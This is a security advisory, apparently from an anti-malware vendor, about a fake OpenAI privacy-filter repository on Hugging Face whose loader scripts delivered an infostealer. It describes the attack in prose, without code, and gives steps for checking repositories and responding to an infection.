A fake OpenAI repository on Hugging Face is a real supply-chain risk, not just a branding mistake. In May 2026, HiddenLayer researchers reported that a repository named Open-OSS/privacy-filter copied OpenAI’s legitimate Privacy Filter model card and used local scripts to run an infostealer on Windows systems.
What was dangerous?
- The repo impersonated an OpenAI privacy-filter project.
- Users were pushed to run
start.batorloader.py. - The loader fetched a hidden PowerShell command and downloaded a second-stage payload.
- The final payload was an infostealer targeting browser data, tokens, wallets, SSH keys, and project secrets.
- Opening the page is much lower risk than cloning the repo and executing its code.
What happened with the fake OpenAI Hugging Face repo?
The malicious repository used trust signals that developers recognize: a familiar AI brand, a plausible privacy tool, copied documentation, and visible popularity. HiddenLayer said the repository appeared near the top of Hugging Face trending and used inflated-looking engagement to look legitimate. The dangerous part was not the model-card text; it was the local execution path.
| Signal | What it means for users |
| Unofficial namespace | A trusted brand name does not prove the repo is maintained by that brand. |
loader.py or start.bat |
Repo code can download payloads, change settings, or run hidden commands. |
| Copied README/model card | Attackers can copy documentation faster than users can verify the maintainer. |
| High download/like count | Popularity can be manipulated and should not replace code review. |
| Encoded URLs or PowerShell | Hidden network stages are a strong warning sign for a model repo. |
How the attack chain worked
HiddenLayer’s analysis describes a staged loader. The Python file first displayed decoy AI-style behavior, then called a hidden function that disabled SSL verification, decoded a remote URL, fetched a command, and passed it to PowerShell. On Windows, that command could launch a hidden second-stage script and run the stealer without showing a normal installer window.
This is why AI repositories must be treated like software packages. A model card may be harmless to read, but a helper script can do anything the current user account is allowed to do.
What can an AI-themed infostealer take?
- Saved browser passwords, cookies, and session tokens.
- OpenAI, Hugging Face, GitHub, cloud, CI/CD, and package-registry tokens.
- SSH keys,
.envfiles, API keys, and local project secrets. - Crypto wallets, wallet extensions, and seed phrases.
- Discord tokens, FTP/VPN credentials, and other developer workstation data.
How to check an AI repo before running it
- Confirm the official organization and maintainer history.
- Read launcher scripts before running them.
- Search for encoded strings, PowerShell calls, unexpected downloads, and disabled certificate checks.
- Run unfamiliar demos in a disposable VM with no production tokens.
- Use low-scope test API keys and revoke them after the test.
- Do not paste secrets into a model demo or notebook you have not reviewed.
What to do if you ran the fake AI tool
If you cloned the fake repo and ran start.bat, loader.py, or another executable from it, treat the workstation as compromised. Do not sign in to important accounts from that device until it is cleaned or rebuilt.
- Disconnect the system from sensitive networks.
- From a clean device, revoke API tokens for OpenAI, Hugging Face, GitHub, cloud providers, CI/CD, package registries, and SSH.
- Rotate passwords and invalidate active sessions.
- Check browser profiles, wallet extensions, SSH folders, and project directories for exposed secrets.
- Run a full malware scan and review persistence points such as Startup, Task Scheduler, services, and recently created files.
- Consider a clean OS reinstall if credential theft is confirmed or you cannot trust the endpoint state.
After uninstalling the suspicious app or deleting the visible threat, use Gridinsoft Anti-Malware to check hidden files, startup entries, scheduled tasks, bundled apps, browser changes, and other persistence points that can restore malware.
Download Anti-MalwareFAQ
Can a Hugging Face repo be malicious?
Yes. Hugging Face hosts many legitimate projects, but an attacker can still upload a fake repo, copied model card, malicious script, or poisoned artifact.
Is opening the repository page enough to infect me?
Usually no. The higher risk begins when you clone the repo, run scripts, install dependencies, open a notebook with executable code, or launch binaries.
Why do attackers impersonate OpenAI?
OpenAI branding makes a repo look familiar. That can push developers to run code quickly before verifying the account, script behavior, or provenance.
Should I rotate API keys after running a fake repo?
Yes. If the tool had access to your local environment, rotate API keys, cloud tokens, GitHub tokens, SSH keys, and any secrets stored near the project.
